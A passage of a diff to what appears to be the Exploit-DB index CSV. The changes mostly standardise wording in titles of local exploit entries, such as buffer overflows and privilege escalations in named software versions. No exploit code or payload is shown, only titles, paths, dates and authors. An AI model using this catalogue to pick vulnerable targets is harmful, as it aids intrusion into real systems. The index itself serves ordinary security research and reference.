Downloader - URL Unicode Conversion Overflow (Metasploit)",2012-02-23,Metasploit,windows,local,0 18547,platforms/windows/local/18547.rb,"DJ Studio Pro 5.1 - '.pls' Stack Buffer Overflow (Metasploit)",2012-03-02,Metasploit,windows,local,0 18533,platforms/windows/local/18533.txt,"Socusoft Photo 2 Video 8.05 - Buffer Overflow",2012-02-27,Vulnerability-Lab,windows,local,0 @@ -7109,7 +7112,7 @@ id,file,description,date,author,platform,type,port 18656,platforms/windows/local/18656.pl,"mmPlayer 2.2 - '.m3u' Local Buffer Overflow (SEH)",2012-03-23,"RjRjh Hack3r",windows,local,0 18657,platforms/windows/local/18657.pl,"mmPlayer 2.2 - '.ppl' Local Buffer Overflow (SEH)",2012-03-23,"RjRjh Hack3r",windows,local,0 18681,platforms/windows/local/18681.txt,"Bitsmith PS Knowbase 3.2.3 - Buffer Overflow",2012-03-30,Vulnerability-Lab,windows,local,0 -18693,platforms/windows/local/18693.py,"BlazeVideo HDTV Player 6.6 Professional - SEH + ASLR + DEP Bypass",2012-04-03,b33f,windows,local,0 +18693,platforms/windows/local/18693.py,"BlazeVideo HDTV Player 6.6 Professional - (SEH + ASLR + DEP Bypass)",2012-04-03,b33f,windows,local,0 18710,platforms/windows/local/18710.rb,"Csound - '.hetro' File Handling Stack Buffer Overflow (Metasploit)",2012-04-06,Metasploit,windows,local,0 18726,platforms/windows/local/18726.py,"Mini-stream RM-MP3 Converter 3.1.2.2 - Local Buffer Overflow",2012-04-09,"SkY-NeT SySteMs",windows,local,0 18733,platforms/linux/local/18733.py,"WICD - Local Privilege Esclation Exploit",2012-04-12,anonymous,linux,local,0 @@ -7405,7 +7408,7 @@ id,file,description,date,author,platform,type,port 19776,platforms/windows/local/19776.pl,"ZipItFast PRO 3.0 - Heap Overflow",2012-07-12,b33f,windows,local,0 19778,platforms/linux/local/19778.c,"RedHat 4.x/5.x/6.x / RedHat man 1.5 / Turbolinux man 1.5 / Turbolinux 3.5/4.x man - Buffer Overrun (1)",2000-02-26,"Babcia Padlina",linux,local,0 19779,platforms/linux/local/19779.c,"RedHat 4.x/5.x/6.x / RedHat man 1.5 / Turbolinux man 1.5 / Turbolinux 3.5/4.x man - Buffer Overrun (2)",2000-02-26,"Babcia Padlina",linux,local,0 -19787,platforms/linux/local/19787.txt,"Corel Linux OS 1.0 - Denial of Serviceemu Distribution Configuration",2000-03-02,suid,linux,local,0 +19787,platforms/linux/local/19787.txt,"Corel Linux OS 1.0 - Dosemu Distribution Configuration",2000-03-02,suid,linux,local,0 19789,platforms/windows/local/19789.txt,"Microsoft Clip Art Gallery 5.0 - Buffer Overflow",2000-03-06,dildog,windows,local,0 19794,platforms/linux/local/19794.txt,"Oracle8i Standard Edition 8.1.5 for Linux Installer - Exploit",2000-03-05,"Keyser Soze",linux,local,0 19796,platforms/multiple/local/19796.c,"Matt Kimball and Roger Wolff mtr 0.28/0.41 / Turbolinux 3.5 b2/4.2/4.4/6.0 - mtr Exploit (2)",2000-03-03,"Babcia Padlina",multiple,local,0 @@ -7480,7 +7483,7 @@ id,file,description,date,author,platform,type,port 20036,platforms/windows/local/20036.pl,"Photodex ProShow Producer 5.0.3256 - Local Buffer Overflow",2012-07-23,mr.pr0n,windows,local,0 20042,platforms/unix/local/20042.c,"Flowerfire Sawmill 5.0.21 - Weak Password Encryption",2000-06-26,"Larry W. Cashdollar",unix,local,0 20045,platforms/linux/local/20045.c,"X 11.0/3.3.3/3.3.4/3.3.5/3.3.6/4.0 - libX11 _XAsyncReply() Stack Corruption",2000-06-19,"Chris Evans",linux,local,0 -20053,platforms/windows/local/20053.py,"MyMp3 Player Stack - '.m3u' DEP Bypass",2012-07-23,"Daniel Romero",windows,local,0 +20053,platforms/windows/local/20053.py,"MyMp3 Player Stack - '.m3u' File DEP Bypass",2012-07-23,"Daniel Romero",windows,local,0 20056,platforms/unix/local/20056.c,"Visible Systems Razor 4.1 - Password File (1)",2000-06-16,pbw,unix,local,0 20058,platforms/unix/local/20058.pl,"Visible Systems Razor 4.1 - Password File (2)",2000-06-15,"Shawn A. Clifford",unix,local,0 20073,platforms/unix/local/20073.txt,"CVSWeb Developer CVSWeb 1.80 - Insecure perl 'open'",2000-07-12,"Joey Hess",unix,local,0 @@ -7539,7 +7542,7 @@ id,file,description,date,author,platform,type,port 20290,platforms/aix/local/20290.txt,"AIX 3.x - bugfiler Arbitrary File Creation",1997-09-08,"Johannes Schwabe",aix,local,0 20291,platforms/linux/local/20291.sh,"Elm 2.4 - 'filter' Arbitrary Mail Disclosure",1995-12-26,"David J Meltzer",linux,local,0 20294,platforms/unix/local/20294.txt,"XFree86 3.3.5/3.3.6 - Xlib Display Buffer Overflow",2000-10-12,"Michal Zalewski",unix,local,0 -20296,platforms/windows/local/20296.rb,"CoolPlayer+ Portable 2.19.2 - Buffer Overflow ASLR Bypass (Large Shellcode)",2012-08-06,"Robert Larsen",windows,local,0 +20296,platforms/windows/local/20296.rb,"CoolPlayer+ Portable 2.19.2 - Buffer Overflow (ASLR Bypass) (Large Shellcode)",2012-08-06,"Robert Larsen",windows,local,0 40428,platforms/windows/local/40428.txt,"Macro Expert 4.0 - Multiple Privilege Escalations",2016-09-26,Tulpa,windows,local,0 20312,platforms/linux/local/20312.c,"Oracle Internet Directory 2.0.6 - oidldap Exploit",2000-10-18,"Juan Manuel Pascual Escribá",linux,local,0 20316,platforms/linux/local/20316.txt,"BSD lpr 0.54 -4 - Arbitrary Command Execution",2000-10-20,"zenith parsec",linux,local,0 @@ -7687,8 +7690,8 @@ id,file,description,date,author,platform,type,port 21063,platforms/linux/local/21063.txt,"Sendmail 8.11/8.12 Debugger - Arbitrary Code Execution (4)",2001-08-17,"RoMaN SoFt",linux,local,0 21069,platforms/windows/local/21069.c,"Microsoft Windows Server 2000 - RunAs Service Named Pipe Hijacking",2001-12-11,Camisade,windows,local,0 21070,platforms/osx/local/21070.txt,"Apple Open Firmware 4.1.7/4.1.8 - Insecure Password",2001-08-15,"Macintosh Security",osx,local,0 -21071,platforms/windows/local/21071.c,"Microsoft IIS 4.0/5.0 - SSI Buffer Overrun Privilege Elevation",2001-08-15,Indigo,windows,local,0 -21072,platforms/windows/local/21072.txt,"Microsoft IIS 5.0 - In-Process Table Privilege Elevation",2001-08-15,"Digital Offense",windows,local,0 +21071,platforms/windows/local/21071.c,"Microsoft IIS 4.0/5.0 - SSI Buffer Overrun Privilege Escalation",2001-08-15,Indigo,windows,local,0 +21072,platforms/windows/local/21072.txt,"Microsoft IIS 5.0 - In-Process Table Privilege Escalation",2001-08-15,"Digital Offense",windows,local,0 21073,platforms/unix/local/21073.txt,"Jakarta Tomcat 3.x/4.0 - Error Message Information Disclosure",2001-08-16,LoWNOISE,unix,local,0 21076,platforms/osx/local/21076.txt,"Intego FileGuard 2.0/4.0 - Weak Password Encryption",2001-08-20,MacSec,osx,local,0 21078,platforms/multiple/local/21078.txt,"Respondus for WebCT 1.1.2 - Weak Password Encryption",2001-08-23,"Desmond Irvine",multiple,local,0 @@ -7700,7 +7703,7 @@ id,file,description,date,author,platform,type,port 21098,platforms/hp-ux/local/21098.c,"HP-UX 11.0 - SWVerify Buffer Overflow",2001-09-03,foo,hp-ux,local,0 21101,platforms/unix/local/21101.sh,"Merit AAA RADIUS Server 3.8 - rlmadmin Symbolic Link",2001-09-07,"Digital Shadow",unix,local,0 21105,platforms/unix/local/21105.c,"Digital Unix 4.0 - MSGCHK Buffer Overflow",2001-09-05,seo,unix,local,0 -21106,platforms/unix/local/21106.txt,"Taylor UUCP 1.0.6 - Argument Handling Privilege Elevation",2001-09-08,zen-parse,unix,local,0 +21106,platforms/unix/local/21106.txt,"Taylor UUCP 1.0.6 - Argument Handling Privilege Escalation",2001-09-08,zen-parse,unix,local,0 21107,platforms/unix/local/21107.sh,"Digital Unix 4.0 - MSGCHK MH_PROFILE Symbolic Link",2001-09-10,seo,unix,local,0 21108,platforms/unix/local/21108.txt,"SpeechD 0.1/0.2 - Privileged Command Execution",2001-09-11,"Tyler Spivey",unix,local,0 21114,platforms/freebsd/local/21114.txt,"FreeBSD 4.3/4.4 - Login Capabilities Privileged File Reading",2001-09-17,"Przemyslaw Frasunek",freebsd,local,0 @@ -7744,7 +7747,7 @@ id,file,description,date,author,platform,type,port 21331,platforms/windows/local/21331.py,"NCMedia Sound Editor Pro 7.5.1 - MRUList201202.dat File Handling Buffer Overflow",2012-09-17,"Julien Ahrens",windows,local,0 21341,platforms/linux/local/21341.c,"Ecartis 1.0.0/0.129 a Listar - Multiple Local Buffer Overflow Vulnerabilities (1)",2002-02-27,"the itch",linux,local,0 21342,platforms/linux/local/21342.c,"Ecartis 1.0.0/0.129 a Listar - Multiple Local Buffer Overflow Vulnerabilities (2)",2002-02-27,"the itch",linux,local,0 -21344,platforms/windows/local/21344.txt,"Microsoft Windows NT 4.0/2000 - Process Handle Local Privilege Elevation",2002-03-13,EliCZ,windows,local,0 +21344,platforms/windows/local/21344.txt,"Microsoft Windows NT 4.0/2000 - Process Handle Local Privilege Escalation",2002-03-13,EliCZ,windows,local,0 21347,platforms/php/local/21347.php,"PHP 3.0.x/4.x - Move_Uploaded_File open_basedir Circumvention",2002-03-17,Tozz,php,local,0 21348,platforms/linux/local/21348.txt,"Webmin 0.x - Code Input Validation",2002-03-20,prophecy,linux,local,0 21351,platforms/windows/local/21351.pl,"WorkforceROI Xpede 4.1/7.0 - Weak Password Encryption",2002-03-22,c3rb3r,windows,local,0 @@ -7854,7 +7857,7 @@ id,file,description,date,author,platform,type,port 21922,platforms/windows/local/21922.c,"Microsoft Windows XP/2000/NT 4.0 - NetDDE Privilege Escalation (1)",2002-10-09,Serus,windows,local,0 21923,platforms/windows/local/21923.c,"Microsoft Windows XP/2000/NT 4.0 - NetDDE Privilege Escalation (2)",2002-10-09,Serus,windows,local,0 21980,platforms/linux/local/21980.c,"Abuse 2.0 - Local Buffer Overflow",2002-11-01,Girish,linux,local,0 -21988,platforms/windows/local/21988.pl,"Huawei Technologies Internet Mobile - Unicode SEH Exploit",2012-10-15,Dark-Puzzle,windows,local,0 +21988,platforms/windows/local/21988.pl,"Huawei Technologies Internet Mobile - Unicode (SEH)",2012-10-15,Dark-Puzzle,windows,local,0 21994,platforms/windows/local/21994.rb,"Microsoft Windows - Escalate Service Permissions Privilege Escalation (Metasploit)",2012-10-16,Metasploit,windows,local,0 22002,platforms/linux/local/22002.txt,"QNX RTOS 6.2 - Application Packager Non-Explicit Path Execution",2002-11-08,Texonet,linux,local,0 22014,platforms/linux/local/22014.c,"Traceroute-nanog 6 - Local Buffer Overflow",2002-11-12,"Carl Livitt",linux,local,0 @@ -7992,14 +7995,14 @@ id,file,description,date,author,platform,type,port 23052,platforms/windows/local/23052.rb,"BlazeVideo HDTV Player Pro 6.6 - Filename Handling (Metasploit)",2012-12-01,Metasploit,windows,local,0 23062,platforms/bsd/local/23062.c,"BSD-Games 2.x - Monop Player Name Local Buffer Overrun (1)",2003-08-25,^sq,bsd,local,0 23063,platforms/bsd/local/23063.c,"BSD-Games 2.x - Monop Player Name Local Buffer Overrun (2)",2003-08-25,N4rK07IX,bsd,local,0 -23077,platforms/linux/local/23077.pl,"MySQL (Linux) - Database Privilege Elevation Exploit",2012-12-02,kingcope,linux,local,0 +23077,platforms/linux/local/23077.pl,"MySQL (Linux) - Database Privilege Escalation",2012-12-02,kingcope,linux,local,0 23096,platforms/windows/local/23096.txt,"Microsoft WordPerfect - Converter Buffer Overrun",2003-09-03,valgasu,windows,local,0 23119,platforms/linux/local/23119.c,"Apache::Gallery 0.4/0.5/0.6 - Insecure File Storage Privilege Escalation",2003-09-09,"Jon Hart",linux,local,0 23126,platforms/linux/local/23126.c,"RealOne Player for Linux 2.2 Alpha - Insecure Configuration File Permission Privilege Escalation",2003-09-09,"Jon Hart",linux,local,0 23141,platforms/sco/local/23141.sh,"SCO OpenServer 5.0.x - 'mana' REMOTE_ADDR Authentication Bypass",2003-09-15,Texonet,sco,local,0 23143,platforms/sco/local/23143.sh,"SCO OpenServer 5.0.x - 'mana' PATH_INFO Privilege Escalation",2003-09-15,Texonet,sco,local,0 23154,platforms/linux/local/23154.c,"Sendmail 8.12.9 - Prescan() Variant Remote Buffer Overrun",2003-09-17,"Gyan Chawdhary",linux,local,0 -23168,platforms/linux/local/23168.pl,"Man Utility 2.3.19 - Local Compression Program Privilege Elevation",2003-09-22,"Sebastian Krahmer",linux,local,0 +23168,platforms/linux/local/23168.pl,"Man Utility 2.3.19 - Local Compression Program Privilege Escalation",2003-09-22,"Sebastian Krahmer",linux,local,0 23189,platforms/linux/local/23189.c,"marbles 1.0.1 - Local Home Environment Variable Buffer Overflow",2003-09-26,demz,linux,local,0 23197,platforms/linux/local/23197.c,"Mah-Jong 1.4 - MJ-Player Server Flag Local Buffer Overflow",2003-09-29,jsk,linux,local,0 23204,platforms/linux/local/23204.c,"Silly Poker 0.25.5 - Local HOME Environment Variable Buffer Overrun",2003-09-30,demz,linux,local,0 @@ -8046,7 +8049,7 @@ id,file,description,date,author,platform,type,port 23740,platforms/linux/local/23740.c,"Samhain Labs 1.x - HSFTP Remote Format String",2004-02-23,priest@priestmaster.org,linux,local,0 23743,platforms/linux/local/23743.txt,"Platform Load Sharing Facility 4/5/6 - 'EAuth' Privilege Escalation",2003-02-23,"Tomasz Grabowski",linux,local,0 23759,platforms/linux/local/23759.pl,"MTools 3.9.x - 'MFormat' Privilege Escalation",2004-02-25,"Sebastian Krahmer",linux,local,0 -23783,platforms/windows/local/23783.rb,"BlazeDVD 6.1 - PLF Exploit DEP/ASLR Bypass (Metasploit)",2012-12-31,"Craig Freyman",windows,local,0 +23783,platforms/windows/local/23783.rb,"BlazeDVD 6.1 - PLF Exploit (DEP + ASLR Bypass) (Metasploit)",2012-12-31,"Craig Freyman",windows,local,0 23838,platforms/aix/local/23838.pl,"GNU Make For IBM AIX 4.3.3 - CC Path Local Buffer Overflow",2003-05-30,watercloud,aix,local,0 23840,platforms/aix/local/23840.pl,"AIX 4.3.3/5.x - Getlvcb Command Line Argument Buffer Overflow (1)",2003-05-30,watercloud,aix,local,0 23841,platforms/aix/local/23841.c,"AIX 4.3.3/5.x - Getlvcb Command Line Argument Buffer Overflow (2)",2004-03-17,mattox,aix,local,0 @@ -8154,7 +8157,7 @@ id,file,description,date,author,platform,type,port 40392,platforms/linux/local/40392.py,"EKG Gadu 1.9~pre+r2855-3+b1 - Local Buffer Overflow",2016-09-19,"Juan Sacco",linux,local,0 25789,platforms/linux/local/25789.c,"FUSE 2.2/2.3 - Local Information Disclosure",2005-06-06,"Miklos Szeredi",linux,local,0 40389,platforms/windows/local/40389.php,"PHP 5.0.0 - 'tidy_parse_file()' Buffer Overflow",2016-09-19,"Yakir Wizman",windows,local,0 -25883,platforms/windows/local/25883.txt,"BOINC Manager (Seti@home) 7.0.64 - Field SEH based Buffer Overflow",2013-06-02,xis_one,windows,local,0 +25883,platforms/windows/local/25883.txt,"BOINC Manager (Seti@home) 7.0.64 - Field Buffer Overflow (SEH)",2013-06-02,xis_one,windows,local,0 25896,platforms/solaris/local/25896.pl,"Sun Solaris 10 Traceroute - Multiple Local Buffer Overflow Vulnerabilities",2005-06-24,"Przemyslaw Frasunek",solaris,local,0 25912,platforms/windows/local/25912.c,"Microsoft Windows NT/2000/2003/2008/XP/Vista/7/8 - Local Ring Exploit (EPATHOBJ)",2013-06-03,"Tavis Ormandy",windows,local,0 25947,platforms/linux/local/25947.txt,"GNU GNATS 4.0/4.1 - Gen-Index Arbitrary Local File Disclosure/Overwrite",2005-07-06,pi3ki31ny,linux,local,0 @@ -8187,7 +8190,7 @@ id,file,description,date,author,platform,type,port 26479,platforms/windows/local/26479.txt,"Zone Labs Zone Alarm 6.0 - Advance Program Control Bypass",2005-11-07,Tr0y-x,windows,local,0 26492,platforms/linux/local/26492.txt,"Emacs 2.1 - Local Variable Arbitrary Command Execution",2002-12-31,"Georgi Guninski",linux,local,0 26498,platforms/linux/local/26498.txt,"Sudo Perl 1.6.x - Environment Variable Handling Security Bypass",2005-11-11,"Charles Morris",linux,local,0 -26520,platforms/windows/local/26520.py,"Static HTTP Server 1.0 - SEH Overflow",2013-07-01,"Jacob Holcomb",windows,local,0 +26520,platforms/windows/local/26520.py,"Static HTTP Server 1.0 - (SEH) Overflow",2013-07-01,"Jacob Holcomb",windows,local,0 26523,platforms/windows/local/26523.rb,"AudioCoder (.lst) - Buffer Overflow (Metasploit)",2013-07-01,Asesino04,windows,local,0 26525,platforms/windows/local/26525.py,"Adrenalin Player 2.2.5.3 - '.wvx' Buffer Overflow (SEH)",2013-07-01,MrXors,windows,local,0 26554,platforms/windows/local/26554.rb,"Microsoft Windows - 'EPATHOBJ::pprFlattenRec' Privilege Escalation (Metasploit)",2013-07-02,Metasploit,windows,local,0 @@ -8285,7 +8288,7 @@ id,file,description,date,author,platform,type,port 29547,platforms/windows/local/29547.rb,"VideoSpirit Pro 1.90 - Buffer Overflow (SEH)",2013-11-12,metacom,windows,local,0 29528,platforms/php/local/29528.txt,"PHP 5.2 - FOpen Safe_mode Restriction-Bypass",2007-01-26,"Maksymilian Arciemowicz",php,local,0 29548,platforms/windows/local/29548.rb,"VideoSpirit Lite 1.77 - Buffer Overflow (SEH)",2013-11-12,metacom,windows,local,0 -29549,platforms/windows/local/29549.pl,"ALLPlayer 5.6.2 - '.m3u' Local Buffer Overflow (SEH/Unicode)",2013-11-12,"Mike Czumak",windows,local,0 +29549,platforms/windows/local/29549.pl,"ALLPlayer 5.6.2 - '.m3u' File Local Buffer Overflow (Unicode SEH)",2013-11-12,"Mike Czumak",windows,local,0 29594,platforms/windows/local/29594.txt,"Watermark Master 2.2.23 - '.wstyle' Buffer Overflow (SEH)",2013-11-14,"Mike Czumak",windows,local,0 29603,platforms/windows/local/29603.txt,"Comodo Firewall 2.3/2.4 - Flawed Component Control Cryptographic Hash",2007-02-15,"Matousec Transparent security",windows,local,0 29630,platforms/windows/local/29630.c,"Microsoft Windows XP/2003 - ReadDirectoryChangesW Information Disclosure",2007-02-22,3APA3A,windows,local,0 @@ -8315,7 +8318,7 @@ id,file,description,date,author,platform,type,port 30295,platforms/multiple/local/30295.sql,"Oracle Database - SQL Compiler Views Unauthorized Manipulation",2007-07-12,bunker,multiple,local,0 30393,platforms/win_x86-64/local/30393.rb,"Nvidia (nvsvc) Display Driver Service - Privilege Escalation (Metasploit)",2013-12-17,Metasploit,win_x86-64,local,0 30392,platforms/windows/local/30392.rb,"Microsoft Windows - 'ndproxy.sys' - Privilege Escalation (Metasploit)",2013-12-17,Metasploit,windows,local,0 -30336,platforms/windows/local/30336.py,"VUPlayer 2.49 - '.m3u' Universal Buffer Overflow (DEP Bypass) (2)",2013-12-16,"Morteza Hashemi",windows,local,0 +30336,platforms/windows/local/30336.py,"VUPlayer 2.49 - '.m3u' File Universal Buffer Overflow (DEP Bypass) (2)",2013-12-16,"Morteza Hashemi",windows,local,0 30802,platforms/windows/local/30802.c,"VMware Tools 3.1 - 'HGFS.Sys' Privilege Escalation",2007-11-24,SoBeIt,windows,local,0 30374,platforms/windows/local/30374.txt,"QuickHeal AntiVirus 7.0.0.1 - Stack Overflow",2013-12-17,"Arash Allebrahim",windows,local,0 30399,platforms/aix/local/30399.c,"IBM AIX 5.2/5.3 - Capture Command Local Stack Based Buffer Overflow",2007-07-26,qaaz,aix,local,0 @@ -8346,7 +8349,7 @@ id,file,description,date,author,platform,type,port 31182,platforms/windows/local/31182.txt,"Ammyy Admin 3.2 - Authentication Bypass",2014-01-24,"Bhadresh Patel",windows,local,0 31346,platforms/linux/local/31346.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write Exploit (2)",2014-02-02,saelo,linux,local,0 31347,platforms/lin_x86-64/local/31347.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X86_X32=y' Privilege Escalation (3)",2014-02-02,rebel,lin_x86-64,local,0 -31386,platforms/windows/local/31386.rb,"Adrenalin Player 2.2.5.3 - '.m3u' Buffer Overflow (SEH) ASLR + DEP Bypass",2014-02-04,"Muhamad Fadzil Ramli",windows,local,0 +31386,platforms/windows/local/31386.rb,"Adrenalin Player 2.2.5.3 - '.m3u' File Buffer Overflow (SEH) (ASLR + DEP Bypass)",2014-02-04,"Muhamad Fadzil Ramli",windows,local,0 31460,platforms/windows/local/31460.txt,"Asseco SEE iBank FX Client 2.0.9.3 - Privilege Escalation",2014-02-06,LiquidWorm,windows,local,0 31524,platforms/windows/local/31524.rb,"Publish-It 3.6d - '.pui' Buffer Overflow (SEH)",2014-02-08,"Muhamad Fadzil Ramli",windows,local,0 31574,platforms/arm/local/31574.c,"Linux Kernel < 3.4.5 (Android 4.2.2/4.4 ARM) - Privilege Escalation",2014-02-11,"Piotr Szerman",arm,local,0 @@ -8447,13 +8450,13 @@ id,file,description,date,author,platform,type,port 33963,platforms/linux/local/33963.txt,"gdomap - Multiple Local Information Disclosure Vulnerabilities",2010-05-07,"Dan Rosenberg",linux,local,0 34112,platforms/windows/local/34112.txt,"Microsoft Windows XP SP3 - 'MQAC.sys' Arbitrary Write Privilege Escalation",2014-07-19,KoreLogic,windows,local,0 34001,platforms/linux/local/34001.c,"Linux Kernel 2.6.x - Btrfs Cloned File Security Bypass",2010-05-18,"Dan Rosenberg",linux,local,0 -34037,platforms/win_x86/local/34037.txt,"OpenVPN Private Tunnel Core Service - Unquoted Service Path Elevation Of Privilege",2014-07-12,LiquidWorm,win_x86,local,0 +34037,platforms/win_x86/local/34037.txt,"OpenVPN Private Tunnel Core Service - Unquoted Service Path Privilege Escalation",2014-07-12,LiquidWorm,win_x86,local,0 40936,platforms/linux/local/40936.html,"Naenara Browser 3.5 (RedStar 3.0 Desktop) - 'JACKRABBIT' Client-Side Command Execution",2016-12-18,"Hacker Fantastic",linux,local,0 34131,platforms/windows/local/34131.py,"Microsoft Windows XP SP3 - 'BthPan.sys' Arbitrary Write Privilege Escalation",2014-07-21,KoreLogic,windows,local,0 34134,platforms/lin_x86-64/local/34134.c,"Linux Kernel < 3.2.0-23 (Ubuntu 12.04 x64) - 'ptrace/sysret' Privilege Escalation",2014-07-21,"Vitaly Nikolenko",lin_x86-64,local,0 34167,platforms/win_x86/local/34167.rb,"Microsoft Windows XP SP3 - 'MQAC.sys' Arbitrary Write Privilege Escalation (Metasploit)",2014-07-25,Metasploit,win_x86,local,0 34267,platforms/linux/local/34267.sh,"Altair Engineering PBS Pro 10.x - 'pbs_mom' Insecure Temporary File Creation",2010-07-07,"Bartlomiej Balcerek",linux,local,0 -40917,platforms/windows/local/40917.py,"Nidesoft MP3 Converter 2.6.18 - SEH Local Buffer Overflow",2016-12-15,malwrforensics,windows,local,0 +40917,platforms/windows/local/40917.py,"Nidesoft MP3 Converter 2.6.18 - Local Buffer Overflow (SEH)",2016-12-15,malwrforensics,windows,local,0 34272,platforms/windows/local/34272.py,"Symantec Endpoint Protection 11.x/12.x - Kernel Pool Overflow Privilege Escalation",2014-08-05,"ryujin & sickness",windows,local,0 34311,platforms/solaris/local/34311.sh,"Oracle Solaris 8/9/10 - 'flar' Insecure Temporary File Creation",2010-07-12,"Frank Stuart",solaris,local,0 34313,platforms/solaris/local/34313.txt,"Oracle Solaris - 'nfslogd' Insecure Temporary File Creation",2010-07-13,"Frank Stuart",solaris,local,0 @@ -8547,9 +8550,9 @@ id,file,description,date,author,platform,type,port 36310,platforms/lin_x86-64/local/36310.txt,"Linux Kernel (x86-64) - Rowhammer Privilege Escalation (PoC)",2015-03-09,"Google Security Research",lin_x86-64,local,0 36311,platforms/lin_x86-64/local/36311.txt,"Rowhammer - NaCl Sandbox Escape (PoC)",2015-03-09,"Google Security Research",lin_x86-64,local,0 36327,platforms/windows/local/36327.txt,"Microsoft Windows XP/7 Kernel - 'win32k.sys' Keyboard Layout Privilege Escalation (MS10-073)",2011-11-22,instruder,windows,local,0 -36390,platforms/windows/local/36390.txt,"Foxit Reader 7.0.6.1126 - Unquoted Service Path Elevation Of Privilege",2015-03-16,LiquidWorm,windows,local,0 +36390,platforms/windows/local/36390.txt,"Foxit Reader 7.0.6.1126 - Unquoted Service Path Privilege Escalation",2015-03-16,LiquidWorm,windows,local,0 36417,platforms/windows/local/36417.txt,"Spybot Search & Destroy 1.6.2 Security Center Service - Privilege Escalation",2015-03-17,LiquidWorm,windows,local,0 -36424,platforms/windows/local/36424.txt,"Microsoft Windows 8.1 - Local WebDAV NTLM Reflection Elevation of Privilege",2015-03-19,"Google Security Research",windows,local,0 +36424,platforms/windows/local/36424.txt,"Microsoft Windows 8.1 - Local WebDAV NTLM Reflection Privilege Escalation",2015-03-19,"Google Security Research",windows,local,0 36430,platforms/linux/local/36430.sh,"HP Application Lifestyle Management 11 - 'GetInstalledPackages' Privilege Escalation",2011-12-08,anonymous,linux,local,0 36437,platforms/windows/local/36437.rb,"Publish-It - '.PUI' Buffer Overflow (SEH) (Metasploit)",2015-03-19,Metasploit,windows,local,0 36465,platforms/windows/local/36465.py,"Free MP3 CD Ripper 2.6 - '.wav' Local Buffer Overflow",2015-03-22,"TUNISIAN CYBER",windows,local,0 @@ -8569,9 +8572,9 @@ id,file,description,date,author,platform,type,port 36813,platforms/hardware/local/36813.txt,"ADB - Backup Archive File Overwrite Directory Traversal",2015-04-21,"Imre Rad",hardware,local,0 36819,platforms/windows/local/36819.pl,"MooPlayer 1.3.0 - 'm3u' Buffer Overflow (SEH) (2)",2015-04-22,"Tomislav Paskalev",windows,local,0 36820,platforms/linux/local/36820.txt,"usb-creator 0.2.x (Ubuntu 12.04/14.04/14.10) - Privilege Escalation",2015-04-23,"Tavis Ormandy",linux,local,0 -36822,platforms/windows/local/36822.pl,"Quick Search 1.1.0.189 - 'search textbox' Unicode SEH Egghunter Buffer Overflow",2015-04-23,"Tomislav Paskalev",windows,local,0 -36826,platforms/windows/local/36826.pl,"Free MP3 CD Ripper 2.6 2.8 - '.wav' SEH Based Buffer Overflow",2015-04-23,ThreatActor,windows,local,0 -36827,platforms/windows/local/36827.py,"Free MP3 CD Ripper 2.6 2.8 - '.wav' SEH Based Buffer Overflow (Windows 7 DEP Bypass)",2015-04-24,naxxo,windows,local,0 +36822,platforms/windows/local/36822.pl,"Quick Search 1.1.0.189 - 'search textbox Buffer Overflow (Unicode SEH) (Egghunter)",2015-04-23,"Tomislav Paskalev",windows,local,0 +36826,platforms/windows/local/36826.pl,"Free MP3 CD Ripper 2.6 2.8 - '.wav' File Buffer Overflow (SEH)",2015-04-23,ThreatActor,windows,local,0 +36827,platforms/windows/local/36827.py,"Free MP3 CD Ripper 2.6 2.8 - '.wav' File Buffer Overflow (SEH) (Windows 7 DEP Bypass)",2015-04-24,naxxo,windows,local,0 36837,platforms/windows/local/36837.rb,"Apple iTunes 10.6.1.7 - '.pls' Title Buffer Overflow",2015-04-27,"Fady Mohammed Osman",windows,local,0 37065,platforms/windows/local/37065.txt,"Comodo GeekBuddy < 4.18.121 - Privilege Escalation",2015-05-20,"Jeremy Brown",windows,local,0 36855,platforms/linux/local/36855.py,"Ninja Privilege Escalation Detection and Prevention System 0.1.3 - Race Condition Privilege Escalation",2015-04-29,"Ben Sheppard",linux,local,0 @@ -8622,15 +8625,15 @@ id,file,description,date,author,platform,type,port 37755,platforms/windows/local/37755.c,"Microsoft Windows Server 2003 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070)",2015-08-12,"Tomislav Paskalev",windows,local,0 37760,platforms/windows/local/37760.rb,"PDF Shaper 3.5 - Buffer Overflow (Metasploit)",2015-08-12,metacom,windows,local,0 37768,platforms/windows/local/37768.txt,"Microsoft Windows 8.1 - DCOM DCE/RPC Local NTLM Reflection Privilege Escalation (MS15-076)",2015-08-13,monoxgas,windows,local,0 -37771,platforms/windows/local/37771.py,"Microsoft HTML Help Compiler 4.74.8702.0 - SEH Based Overflow",2015-08-15,St0rn,windows,local,0 +37771,platforms/windows/local/37771.py,"Microsoft HTML Help Compiler 4.74.8702.0 - Overflow (SEH)",2015-08-15,St0rn,windows,local,0 37772,platforms/multiple/local/37772.js,"Mozilla Firefox < 39.03 - 'pdf.js' Same Origin Policy Exploit",2015-08-15,"Tantaryu MING",multiple,local,0 37780,platforms/windows/local/37780.c,"ThinPrint - 'tpfc.dll' Insecure Library Loading Arbitrary Code Execution",2012-09-04,"Moshe Zioni",windows,local,0 -37799,platforms/windows/local/37799.py,"MASM321 11 Quick Editor - '.qeditor' 4.0g - '.qse' SEH Based Buffer Overflow (ASLR & SAFESEH Bypass)",2015-08-17,St0rn,windows,local,0 +37799,platforms/windows/local/37799.py,"MASM321 11 Quick Editor - '.qeditor' 4.0g - '.qse' File Buffer Overflow (SEH) (ASLR + SafeSEH Bypass)",2015-08-17,St0rn,windows,local,0 37813,platforms/windows/local/37813.rb,"VideoCharge Studio - Buffer Overflow (SEH) (Metasploit)",2015-08-18,Metasploit,windows,local,0 37937,platforms/linux/local/37937.c,"Linux Kernel 3.2.x - 'uname()' System Call Local Information Disclosure",2012-10-09,"Brad Spengler",linux,local,0 37890,platforms/windows/local/37890.py,"Multiple ChiefPDF Software 2.0 - Buffer Overflow",2015-08-20,metacom,windows,local,0 37898,platforms/linux/local/37898.py,"Reaver Pro - Privilege Escalation",2012-09-30,infodox,linux,local,0 -37925,platforms/windows/local/37925.txt,"Mozilla - Maintenance Service Log File Overwrite Elevation of Privilege",2015-08-21,"Google Security Research",windows,local,0 +37925,platforms/windows/local/37925.txt,"Mozilla - Maintenance Service Log File Overwrite Privilege Escalation",2015-08-21,"Google Security Research",windows,local,0 37964,platforms/windows/local/37964.c,"Broadcom WIDCOMM Bluetooth - 